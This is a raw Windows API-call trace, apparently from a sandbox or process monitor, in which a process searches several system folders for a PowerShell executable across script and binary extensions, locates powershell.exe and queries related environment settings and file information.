	[0327.107] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.107] SetErrorMode (uMode=0x1) returned 0x1
	[0327.107] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.108] SetErrorMode (uMode=0x1) returned 0x1
	[0327.108] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.108] SetErrorMode (uMode=0x1) returned 0x1
	[0327.108] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.108] SetErrorMode (uMode=0x1) returned 0x1
	[0327.108] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.109] SetErrorMode (uMode=0x1) returned 0x1
	[0327.109] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.109] SetErrorMode (uMode=0x1) returned 0x1
	[0327.109] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.109] SetErrorMode (uMode=0x1) returned 0x1
	[0327.109] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.110] SetErrorMode (uMode=0x1) returned 0x1
	[0327.110] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.110] SetErrorMode (uMode=0x1) returned 0x1
	[0327.110] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.110] SetErrorMode (uMode=0x1) returned 0x1
	[0327.110] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.110] SetErrorMode (uMode=0x1) returned 0x1
	[0327.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.111] SetErrorMode (uMode=0x1) returned 0x1
	[0327.111] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.111] SetErrorMode (uMode=0x1) returned 0x1
	[0327.111] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.111] SetErrorMode (uMode=0x1) returned 0x1
	[0327.111] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.112] SetErrorMode (uMode=0x1) returned 0x1
	[0327.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.112] SetErrorMode (uMode=0x1) returned 0x1
	[0327.112] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.112] SetErrorMode (uMode=0x1) returned 0x1
	[0327.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.113] SetErrorMode (uMode=0x1) returned 0x1
	[0327.113] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.113] SetErrorMode (uMode=0x1) returned 0x1
	[0327.113] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.113] SetErrorMode (uMode=0x1) returned 0x1
	[0327.113] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.113] SetErrorMode (uMode=0x1) returned 0x1
	[0327.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.114] SetErrorMode (uMode=0x1) returned 0x1
	[0327.114] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.114] SetErrorMode (uMode=0x1) returned 0x1
	[0327.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.114] SetErrorMode (uMode=0x1) returned 0x1
	[0327.114] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.115] SetErrorMode (uMode=0x1) returned 0x1
	[0327.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.115] SetErrorMode (uMode=0x1) returned 0x1
	[0327.115] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.115] SetErrorMode (uMode=0x1) returned 0x1
	[0327.115] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.116] SetErrorMode (uMode=0x1) returned 0x1
	[0327.116] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.116] SetErrorMode (uMode=0x1) returned 0x1
	[0327.116] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.116] SetErrorMode (uMode=0x1) returned 0x1
	[0327.116] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.117] SetErrorMode (uMode=0x1) returned 0x1
	[0327.117] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.117] SetErrorMode (uMode=0x1) returned 0x1
	[0327.117] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.117] SetErrorMode (uMode=0x1) returned 0x1
	[0327.117] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.117] SetErrorMode (uMode=0x1) returned 0x1
	[0327.117] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.118] SetErrorMode (uMode=0x1) returned 0x1
	[0327.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.118] SetErrorMode (uMode=0x1) returned 0x1
	[0327.118] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.118] SetErrorMode (uMode=0x1) returned 0x1
	[0327.118] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.119] SetErrorMode (uMode=0x1) returned 0x1
	[0327.119] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.119] SetErrorMode (uMode=0x1) returned 0x1
	[0327.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.119] SetErrorMode (uMode=0x1) returned 0x1
	[0327.119] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.120] SetErrorMode (uMode=0x1) returned 0x1
	[0327.120] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0327.120] SetErrorMode (uMode=0x1) returned 0x1
	[0327.120] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.120] SetErrorMode (uMode=0x1) returned 0x1
	[0327.120] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0327.120] SetErrorMode (uMode=0x1) returned 0x1
	[0327.121] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.121] SetErrorMode (uMode=0x1) returned 0x1
	[0327.121] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0327.121] SetErrorMode (uMode=0x1) returned 0x1
	[0327.121] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.121] SetErrorMode (uMode=0x1) returned 0x1
	[0327.122] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0327.122] SetErrorMode (uMode=0x1) returned 0x1
	[0327.122] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.122] SetErrorMode (uMode=0x1) returned 0x1
	[0327.122] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7bdb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0327.122] SetErrorMode (uMode=0x1) returned 0x1
	[0327.122] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c7bdce0 | out: lpFindFileData=0x1c7bdce0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0x1b51a0
	[0327.124] FindNextFileW (in: hFindFile=0x1b51a0, lpFindFileData=0x1c7bdcf0 | out: lpFindFileData=0x1c7bdcf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="powershell.exe", cAlternateFileName="")) returned 0
	[0327.124] FindClose (in: hFindFile=0x1b51a0 | out: hFindFile=0x1b51a0) returned 1
	[0327.124] SetErrorMode (uMode=0x1) returned 0x1
	[0327.763] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c7bde00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0327.763] SetErrorMode (uMode=0x1) returned 0x1
	[0327.763] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c7be010 | out: lpFileInformation=0x1c7be010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0327.763] SetErrorMode (uMode=0x1) returned 0x1
	[0328.294] CoTaskMemAlloc (cb=0x104) returned 0x24c710
	[0328.294] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0328.294] CoTaskMemFree (pv=0x24c710) 
	[0328.766] CoTaskMemAlloc (cb=0x104) returned 0x24c710
	[0328.766] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0328.766] CoTaskMemFree (pv=0x24c710) 
	[0328.770] CoTaskMemAlloc (cb=0x104) returned 0x24c710
	[0328.770] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0328.770] CoTaskMemFree (pv=0x24c710) 
	[0328.780] CoTaskMemAlloc (cb=0x104) returned 0x24c710
	[0328.780] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0328.781] CoTaskMemFree (pv=0x24c710) 
	[0329.407] CoTaskMemAlloc (cb=0x3b) returned 0x1b8c6070
	[0329.977] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c7be1f8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c7be1f8) returned 0x4550
	[0329.978] CoTaskMemFree (pv=0x1b8c6070) 
	[0329.981] GetConsoleWindow () returned 0x301f2
	[0329.999] CoTaskMemAlloc (cb=0x104) returned 0x24c710
	[0329.999] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x24c710, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0329.999] CoTaskMemFree (pv=0x24c710) 
	[0330.001] CoTaskMemAlloc (cb=0x104) returned 0x24c710
